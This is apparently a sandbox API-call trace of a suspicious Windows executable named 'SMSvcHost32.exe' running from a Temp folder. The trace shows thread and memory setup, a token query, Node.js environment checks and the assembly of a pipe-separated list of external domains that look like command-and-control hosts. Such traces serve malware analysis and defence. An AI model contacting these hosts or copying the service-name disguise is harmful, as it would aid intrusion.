	[0098.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x429d812, lpParameter=0x26ea730, dwCreationFlags=0x0, lpThreadId=0x517e4c | out: lpThreadId=0x517e4c*=0xf80) returned 0x6f8
	[0098.621] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x6fc
	[0098.621] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x700
	[0098.621] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x704
	[0098.622] SetLastError (dwErrCode=0x0) 
	[0098.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x429d812, lpParameter=0x26eaaf8, dwCreationFlags=0x0, lpThreadId=0x517cfc | out: lpThreadId=0x517cfc*=0xaf4) returned 0x708
	[0098.622] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x70c
	[0098.622] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x710
	[0098.622] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x714
	[0098.622] SetLastError (dwErrCode=0x0) 
	[0098.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x429d812, lpParameter=0x26f8ff0, dwCreationFlags=0x0, lpThreadId=0x517e7c | out: lpThreadId=0x517e7c*=0x8ac) returned 0x718
	[0098.624] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x71c
	[0098.624] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x720
	[0098.624] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x724
	[0098.624] SetLastError (dwErrCode=0x0) 
	[0098.624] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x429d812, lpParameter=0x26f93b8, dwCreationFlags=0x0, lpThreadId=0x517d4c | out: lpThreadId=0x517d4c*=0xb5c) returned 0x728
	[0098.625] timeGetTime () returned 0x2c375
	[0098.625] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20afb78 | out: lpSystemTimeAsFileTime=0x20afb78*(dwLowDateTime=0x6c5e70b0, dwHighDateTime=0x1d492ec)) 
	[0098.626] timeGetTime () returned 0x2c376
	[0098.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20afb6c | out: lpSystemTimeAsFileTime=0x20afb6c*(dwLowDateTime=0x6c5e97d6, dwHighDateTime=0x1d492ec)) 
	[0098.627] VirtualAlloc (lpAddress=0x2ee00000, dwSize=0x120000, flAllocationType=0x2000, flProtect=0x1) returned 0x2ee00000
	[0098.627] VirtualFree (lpAddress=0x2ee00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0098.627] VirtualAlloc (lpAddress=0x2ee00000, dwSize=0x11000, flAllocationType=0x2000, flProtect=0x1) returned 0x2ee00000
	[0098.628] VirtualAlloc (lpAddress=0x2ee00000, dwSize=0x11000, flAllocationType=0x1000, flProtect=0x4) returned 0x2ee00000
	[0098.633] SetLastError (dwErrCode=0x0) 
	[0098.633] GetLastError () returned 0x0
	[0098.633] SetLastError (dwErrCode=0x0) 
	[0098.633] GetLastError () returned 0x0
	[0098.633] SetLastError (dwErrCode=0x0) 
	[0098.633] SetLastError (dwErrCode=0x0) 
	[0098.633] GetLastError () returned 0x0
	[0098.633] SetLastError (dwErrCode=0x0) 
	[0098.633] GetLastError () returned 0x0
	[0098.633] SetLastError (dwErrCode=0x0) 
	[0098.643] SetLastError (dwErrCode=0x0) 
	[0098.643] GetLastError () returned 0x0
	[0098.643] SetLastError (dwErrCode=0x0) 
	[0098.643] GetLastError () returned 0x0
	[0098.643] SetLastError (dwErrCode=0x0) 
	[0098.643] SetLastError (dwErrCode=0x0) 
	[0098.643] GetLastError () returned 0x0
	[0098.643] SetLastError (dwErrCode=0x0) 
	[0098.643] GetLastError () returned 0x0
	[0098.643] SetLastError (dwErrCode=0x0) 
	[0098.643] SetLastError (dwErrCode=0x0) 
	[0098.643] GetLastError () returned 0x0
	[0098.643] SetLastError (dwErrCode=0x0) 
	[0098.643] GetLastError () returned 0x0
	[0098.643] SetLastError (dwErrCode=0x0) 
	[0098.644] SetLastError (dwErrCode=0x0) 
	[0098.644] GetLastError () returned 0x0
	[0098.644] SetLastError (dwErrCode=0x0) 
	[0098.644] GetLastError () returned 0x0
	[0098.644] SetLastError (dwErrCode=0x0) 
	[0098.646] SetLastError (dwErrCode=0x0) 
	[0098.646] GetLastError () returned 0x0
	[0098.646] SetLastError (dwErrCode=0x0) 
	[0098.646] GetLastError () returned 0x0
	[0098.646] SetLastError (dwErrCode=0x0) 
	[0098.647] SetLastError (dwErrCode=0x0) 
	[0098.647] GetLastError () returned 0x0
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] GetLastError () returned 0x0
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] GetLastError () returned 0x0
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] GetLastError () returned 0x0
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] GetLastError () returned 0x0
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] GetLastError () returned 0x0
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] GetLastError () returned 0x0
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.648] GetLastError () returned 0x0
	[0098.648] SetLastError (dwErrCode=0x0) 
	[0098.649] SetLastError (dwErrCode=0x0) 
	[0098.649] GetLastError () returned 0x0
	[0098.649] SetLastError (dwErrCode=0x0) 
	[0098.649] GetLastError () returned 0x0
	[0098.649] SetLastError (dwErrCode=0x0) 
	[0098.649] SetLastError (dwErrCode=0x0) 
	[0098.649] GetLastError () returned 0x0
	[0098.649] SetLastError (dwErrCode=0x0) 
	[0098.649] GetLastError () returned 0x0
	[0098.649] SetLastError (dwErrCode=0x0) 
	[0098.716] SetLastError (dwErrCode=0x0) 
	[0098.716] GetLastError () returned 0x0
	[0098.716] SetLastError (dwErrCode=0x0) 
	[0098.716] GetLastError () returned 0x0
	[0098.716] SetLastError (dwErrCode=0x0) 
	[0098.717] SetLastError (dwErrCode=0x0) 
	[0098.717] GetLastError () returned 0x0
	[0098.717] SetLastError (dwErrCode=0x0) 
	[0098.717] GetLastError () returned 0x0
	[0098.717] SetLastError (dwErrCode=0x0) 
	[0098.717] SetLastError (dwErrCode=0x0) 
	[0098.717] GetLastError () returned 0x0
	[0098.717] SetLastError (dwErrCode=0x0) 
	[0098.717] GetLastError () returned 0x0
	[0098.717] SetLastError (dwErrCode=0x0) 
	[0098.723] SetLastError (dwErrCode=0x0) 
	[0098.723] GetLastError () returned 0x0
	[0098.723] SetLastError (dwErrCode=0x0) 
	[0098.723] GetLastError () returned 0x0
	[0098.723] SetLastError (dwErrCode=0x0) 
	[0098.730] SetLastError (dwErrCode=0x0) 
	[0098.730] GetLastError () returned 0x0
	[0098.730] SetLastError (dwErrCode=0x0) 
	[0098.730] GetLastError () returned 0x0
	[0098.730] SetLastError (dwErrCode=0x0) 
	[0098.730] SetLastError (dwErrCode=0x0) 
	[0098.730] GetLastError () returned 0x0
	[0098.731] SetLastError (dwErrCode=0x0) 
	[0098.731] GetLastError () returned 0x0
	[0098.731] SetLastError (dwErrCode=0x0) 
	[0098.731] SetLastError (dwErrCode=0x0) 
	[0098.731] GetLastError () returned 0x0
	[0098.731] SetLastError (dwErrCode=0x0) 
	[0098.731] GetLastError () returned 0x0
	[0098.731] SetLastError (dwErrCode=0x0) 
	[0098.731] SetLastError (dwErrCode=0x0) 
	[0098.731] GetLastError () returned 0x0
	[0098.731] SetLastError (dwErrCode=0x0) 
	[0098.731] GetLastError () returned 0x0
	[0098.731] SetLastError (dwErrCode=0x0) 
	[0098.850] SetLastError (dwErrCode=0x0) 
	[0098.850] GetLastError () returned 0x0
	[0098.850] SetLastError (dwErrCode=0x0) 
	[0098.850] GetLastError () returned 0x0
	[0098.850] SetLastError (dwErrCode=0x0) 
	[0098.850] SetLastError (dwErrCode=0x0) 
	[0098.850] GetLastError () returned 0x0
	[0098.850] SetLastError (dwErrCode=0x0) 
	[0098.850] GetLastError () returned 0x0
	[0098.851] SetLastError (dwErrCode=0x0) 
	[0098.853] SetLastError (dwErrCode=0x0) 
	[0098.853] GetLastError () returned 0x0
	[0098.853] SetLastError (dwErrCode=0x0) 
	[0098.853] GetLastError () returned 0x0
	[0098.853] SetLastError (dwErrCode=0x0) 
	[0098.877] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20afba4 | out: TokenHandle=0x20afba4*=0x730) returned 1
	[0098.877] GetTokenInformation (in: TokenHandle=0x730, TokenInformationClass=0xc, TokenInformation=0x20afba8, TokenInformationLength=0x4, ReturnLength=0x20afbb0 | out: TokenInformation=0x20afba8, ReturnLength=0x20afbb0) returned 1
	[0098.877] CloseHandle (hObject=0x730) returned 1
	[0098.877] GetCurrentProcessId () returned 0xdd4
	[0098.878] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x56cf80, nSize=0x208 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 0x34
	[0098.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", cchWideChar=-1, lpMultiByteStr=0x25d0938, cbMultiByte=520, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 53
	[0098.878] GetLastError () returned 0x0
	[0098.878] SetLastError (dwErrCode=0x0) 
	[0098.878] GetLastError () returned 0x0
	[0098.878] SetLastError (dwErrCode=0x0) 
	[0098.879] lstrlenA (lpString="") returned 0
	[0098.879] lstrcatA (in: lpString1="", lpString2="xmpp.dolcesognar.it" | out: lpString1="xmpp.dolcesognar.it") returned="xmpp.dolcesognar.it"
	[0098.879] lstrlenA (lpString="xmpp.dolcesognar.it") returned 19
	[0098.879] lstrcatA (in: lpString1="xmpp.dolcesognar.it", lpString2="|" | out: lpString1="xmpp.dolcesognar.it|") returned="xmpp.dolcesognar.it|"
	[0098.879] lstrcatA (in: lpString1="xmpp.dolcesognar.it|", lpString2="xmpp.dolcesognar.it" | out: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it") returned="xmpp.dolcesognar.it|xmpp.dolcesognar.it"
	[0098.879] lstrlenA (lpString="xmpp.dolcesognar.it|xmpp.dolcesognar.it") returned 39
	[0098.879] lstrcatA (in: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it", lpString2="|" | out: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|") returned="xmpp.dolcesognar.it|xmpp.dolcesognar.it|"
	[0098.879] lstrcatA (in: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|", lpString2="spop.lestanzedifederica.com" | out: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com") returned="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com"
	[0098.880] lstrlenA (lpString="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com") returned 67
	[0098.880] lstrcatA (in: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com", lpString2="|" | out: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|") returned="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|"
	[0098.880] lstrcatA (in: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|", lpString2="arb.palaser.eu" | out: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|arb.palaser.eu") returned="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|arb.palaser.eu"
	[0098.880] lstrlenA (lpString="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|arb.palaser.eu") returned 82
	[0098.880] lstrcatA (in: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|arb.palaser.eu", lpString2="|" | out: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|arb.palaser.eu|") returned="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|arb.palaser.eu|"
	[0098.880] lstrcatA (in: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|arb.palaser.eu|", lpString2="gttopr.space" | out: lpString1="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|arb.palaser.eu|gttopr.space") returned="xmpp.dolcesognar.it|xmpp.dolcesognar.it|spop.lestanzedifederica.com|arb.palaser.eu|gttopr.space"
	[0098.935] SetLastError (dwErrCode=0x0) 
	[0098.935] GetLastError () returned 0x0
	[0098.935] SetLastError (dwErrCode=0x0) 
	[0098.936] SetLastError (dwErrCode=0x0) 
	[0098.936] GetLastError () returned 0x0
	[0098.936] SetLastError (dwErrCode=0x0) 
	[0098.936] lstrcmpA (lpString1="natives", lpString2="constants") returned 1
	[0098.936] lstrcmpA (lpString1="natives", lpString2="natives") returned 0
	[0099.160] timeGetTime () returned 0x2c58b
	[0099.160] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aeea4 | out: lpSystemTimeAsFileTime=0x20aeea4*(dwLowDateTime=0x6cb00934, dwHighDateTime=0x1d492ec)) 
	[0099.160] timeGetTime () returned 0x2c58b
	[0099.160] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aee94 | out: lpSystemTimeAsFileTime=0x20aee94*(dwLowDateTime=0x6cb01ce5, dwHighDateTime=0x1d492ec)) 
	[0099.160] VirtualAlloc (lpAddress=0x38800000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x38800000
	[0099.166] VirtualAlloc (lpAddress=0x2f700000, dwSize=0x200000, flAllocationType=0x2000, flProtect=0x1) returned 0x2f700000
	[0099.166] VirtualFree (lpAddress=0x2f700000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0099.166] VirtualAlloc (lpAddress=0x2f700000, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2f700000
	[0099.167] VirtualAlloc (lpAddress=0x2f700000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x2f700000
	[0099.174] VirtualAlloc (lpAddress=0x1d401000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d401000
	[0099.174] VirtualAlloc (lpAddress=0x1d402000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d402000
	[0099.176] timeGetTime () returned 0x2c59c
	[0099.176] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aeea4 | out: lpSystemTimeAsFileTime=0x20aeea4*(dwLowDateTime=0x6cb28e6f, dwHighDateTime=0x1d492ec)) 
	[0099.176] timeGetTime () returned 0x2c59c
	[0099.176] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aee94 | out: lpSystemTimeAsFileTime=0x20aee94*(dwLowDateTime=0x6cb28e6f, dwHighDateTime=0x1d492ec)) 
	[0099.177] timeGetTime () returned 0x2c59c
	[0099.177] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aeea4 | out: lpSystemTimeAsFileTime=0x20aeea4*(dwLowDateTime=0x6cb2a1da, dwHighDateTime=0x1d492ec)) 
	[0099.177] timeGetTime () returned 0x2c59c
	[0099.177] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aee94 | out: lpSystemTimeAsFileTime=0x20aee94*(dwLowDateTime=0x6cb2a1da, dwHighDateTime=0x1d492ec)) 
	[0099.304] timeGetTime () returned 0x2c61b
	[0099.304] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aeef0 | out: lpSystemTimeAsFileTime=0x20aeef0*(dwLowDateTime=0x6cc615d9, dwHighDateTime=0x1d492ec)) 
	[0099.304] timeGetTime () returned 0x2c61c
	[0099.304] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aeee0 | out: lpSystemTimeAsFileTime=0x20aeee0*(dwLowDateTime=0x6cc615d9, dwHighDateTime=0x1d492ec)) 
	[0099.310] VirtualAlloc (lpAddress=0x27400000, dwSize=0x200000, flAllocationType=0x2000, flProtect=0x1) returned 0x27400000
	[0099.311] VirtualFree (lpAddress=0x27400000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0099.311] VirtualAlloc (lpAddress=0x27400000, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x27400000
	[0099.311] VirtualAlloc (lpAddress=0x27400000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x27400000
	[0099.337] timeGetTime () returned 0x2c63d
	[0099.337] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aeef0 | out: lpSystemTimeAsFileTime=0x20aeef0*(dwLowDateTime=0x6ccb32e2, dwHighDateTime=0x1d492ec)) 
	[0099.338] timeGetTime () returned 0x2c63d
	[0099.338] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aeee0 | out: lpSystemTimeAsFileTime=0x20aeee0*(dwLowDateTime=0x6ccb32e2, dwHighDateTime=0x1d492ec)) 
	[0099.338] timeGetTime () returned 0x2c63d
	[0099.338] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aeef0 | out: lpSystemTimeAsFileTime=0x20aeef0*(dwLowDateTime=0x6ccb32e2, dwHighDateTime=0x1d492ec)) 
	[0099.338] timeGetTime () returned 0x2c63d
	[0099.338] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aeee0 | out: lpSystemTimeAsFileTime=0x20aeee0*(dwLowDateTime=0x6ccb32e2, dwHighDateTime=0x1d492ec)) 
	[0099.358] SetLastError (dwErrCode=0x0) 
	[0099.358] GetLastError () returned 0x0
	[0099.358] SetLastError (dwErrCode=0x0) 
	[0099.358] GetLastError () returned 0x0
	[0099.358] SetLastError (dwErrCode=0x0) 
	[0099.367] SetLastError (dwErrCode=0x0) 
	[0099.367] GetLastError () returned 0x0
	[0099.367] SetLastError (dwErrCode=0x0) 
	[0099.367] GetLastError () returned 0x0
	[0099.367] SetLastError (dwErrCode=0x0) 
	[0099.423] SetLastError (dwErrCode=0x0) 
	[0099.423] GetLastError () returned 0x0
	[0099.423] SetLastError (dwErrCode=0x0) 
	[0099.423] SetLastError (dwErrCode=0x0) 
	[0099.423] GetLastError () returned 0x0
	[0099.423] SetLastError (dwErrCode=0x0) 
	[0099.431] GetEnvironmentVariableW (in: lpName="NODE_CHANNEL_FD", lpBuffer=0x209f8b4, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0099.431] GetLastError () returned 0xcb
	[0099.431] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20af350 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0099.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\Desktop", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26
	[0099.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\Desktop", cchWideChar=-1, lpMultiByteStr=0x20af574, cbMultiByte=1040, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Nd9E1FYi\\Desktop", lpUsedDefaultChar=0x0) returned 26
	[0099.435] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x209f8cc, nSize=0x7fff | out: lpBuffer="Nd9E1FYi") returned 0x8
	[0099.435] GetEnvironmentVariableW (in: lpName="startupObject", lpBuffer=0x209f8cc, nSize=0x7fff | out: lpBuffer="Nd9E1FYi") returned 0x0
	[0099.435] GetLastError () returned 0xcb
	[0099.438] SetLastError (dwErrCode=0x0) 
	[0099.438] GetLastError () returned 0x0
	[0099.438] SetLastError (dwErrCode=0x0) 
	[0099.438] lstrcmpA (lpString1="constants", lpString2="constants") returned 0
	[0099.441] SetLastError (dwErrCode=0x0) 
	[0099.441] GetLastError () returned 0x0
	[0099.441] SetLastError (dwErrCode=0x0) 
	[0099.441] SetLastError (dwErrCode=0x0) 
	[0099.441] GetLastError () returned 0x0
	[0099.442] SetLastError (dwErrCode=0x0) 
	[0099.442] GetEnvironmentVariableW (in: lpName="NODE_HEAPDUMP_OPTIONS", lpBuffer=0x209f81c, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0099.442] GetLastError () returned 0xcb
	[0099.510] timeGetTime () returned 0x2c6e9
	[0099.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aebdc | out: lpSystemTimeAsFileTime=0x20aebdc*(dwLowDateTime=0x6ce570f4, dwHighDateTime=0x1d492ec)) 
	[0099.510] timeGetTime () returned 0x2c6e9
	[0099.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aebcc | out: lpSystemTimeAsFileTime=0x20aebcc*(dwLowDateTime=0x6ce570f4, dwHighDateTime=0x1d492ec)) 
	[0099.510] VirtualAlloc (lpAddress=0x38100000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x38100000
	[0099.513] VirtualAlloc (lpAddress=0x38900000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x38900000
	[0099.524] timeGetTime () returned 0x2c6f8
	[0099.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aebdc | out: lpSystemTimeAsFileTime=0x20aebdc*(dwLowDateTime=0x6ce7bbd4, dwHighDateTime=0x1d492ec)) 
	[0099.525] timeGetTime () returned 0x2c6f8
	[0099.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aebcc | out: lpSystemTimeAsFileTime=0x20aebcc*(dwLowDateTime=0x6ce7bbd4, dwHighDateTime=0x1d492ec)) 
	[0099.525] timeGetTime () returned 0x2c6f8
	[0099.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aebdc | out: lpSystemTimeAsFileTime=0x20aebdc*(dwLowDateTime=0x6ce7bbd4, dwHighDateTime=0x1d492ec)) 
	[0099.525] timeGetTime () returned 0x2c6f9
	[0099.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20aebcc | out: lpSystemTimeAsFileTime=0x20aebcc*(dwLowDateTime=0x6ce7cee1, dwHighDateTime=0x1d492ec)) 
	[0099.527] SetLastError (dwErrCode=0x0) 
	[0099.527] GetLastError () returned 0x0
	[0099.527] SetLastError (dwErrCode=0x0) 
	[0099.527] GetEnvironmentVariableW (in: lpName="NODE_DEBUG", lpBuffer=0x209f59c, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0099.527] GetLastError () returned 0xcb
	[0099.529] QueryPerformanceFrequency (in: lpFrequency=0x20af514 | out: lpFrequency=0x20af514) returned 1
	[0099.529] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af650 | out: lpPreviousCount=0x20af650) returned 1
	[0099.533] SetLastError (dwErrCode=0x0) 
	[0099.533] GetLastError () returned 0x0
	[0099.533] SetLastError (dwErrCode=0x0) 
	[0099.534] SetLastError (dwErrCode=0x0) 
	[0099.534] GetLastError () returned 0x0
	[0099.534] SetLastError (dwErrCode=0x0) 
	[0099.534] GetLastError () returned 0x0
	[0099.534] SetLastError (dwErrCode=0x0) 
	[0099.534] _strcmpi (_Str1="utf8", _Str2="utf8") returned 0
	[0099.535] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.536] SetLastError (dwErrCode=0x0) 
	[0099.536] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.537] GetLastError () returned 0x0
	[0099.537] SetLastError (dwErrCode=0x0) 
	[0099.538] GetLastError () returned 0x0
	[0099.538] SetLastError (dwErrCode=0x0) 
	[0099.538] GetLastError () returned 0x0
	[0099.538] SetLastError (dwErrCode=0x0) 
	[0099.538] GetLastError () returned 0x0
	[0099.538] SetLastError (dwErrCode=0x0) 
	[0099.538] GetLastError () returned 0x0
	[0099.538] SetLastError (dwErrCode=0x0) 
	[0099.538] GetLastError () returned 0x0
	[0099.538] SetLastError (dwErrCode=0x0) 
	[0099.539] GetLastError () returned 0x0
	[0099.539] SetLastError (dwErrCode=0x0) 
	[0099.539] GetLastError () returned 0x0
	[0099.539] SetLastError (dwErrCode=0x0) 
	[0099.539] GetLastError () returned 0x0
	[0099.539] SetLastError (dwErrCode=0x0) 
	[0099.539] GetLastError () returned 0x0
	[0099.539] SetLastError (dwErrCode=0x0) 
	[0099.539] GetLastError () returned 0x0
	[0099.539] SetLastError (dwErrCode=0x0) 
	[0099.539] GetLastError () returned 0x0
	[0099.539] SetLastError (dwErrCode=0x0) 
	[0099.539] GetLastError () returned 0x0
	[0099.539] SetLastError (dwErrCode=0x0) 
	[0099.540] GetLastError () returned 0x0
	[0099.540] SetLastError (dwErrCode=0x0) 
	[0099.540] GetLastError () returned 0x0
	[0099.540] SetLastError (dwErrCode=0x0) 
	[0099.540] GetLastError () returned 0x0
	[0099.540] SetLastError (dwErrCode=0x0) 
	[0099.540] GetLastError () returned 0x0
	[0099.540] SetLastError (dwErrCode=0x0) 
	[0099.540] GetLastError () returned 0x0
	[0099.540] SetLastError (dwErrCode=0x0) 
	[0099.540] GetLastError () returned 0x0
	[0099.540] SetLastError (dwErrCode=0x0) 
	[0099.540] GetLastError () returned 0x0
	[0099.540] SetLastError (dwErrCode=0x0) 
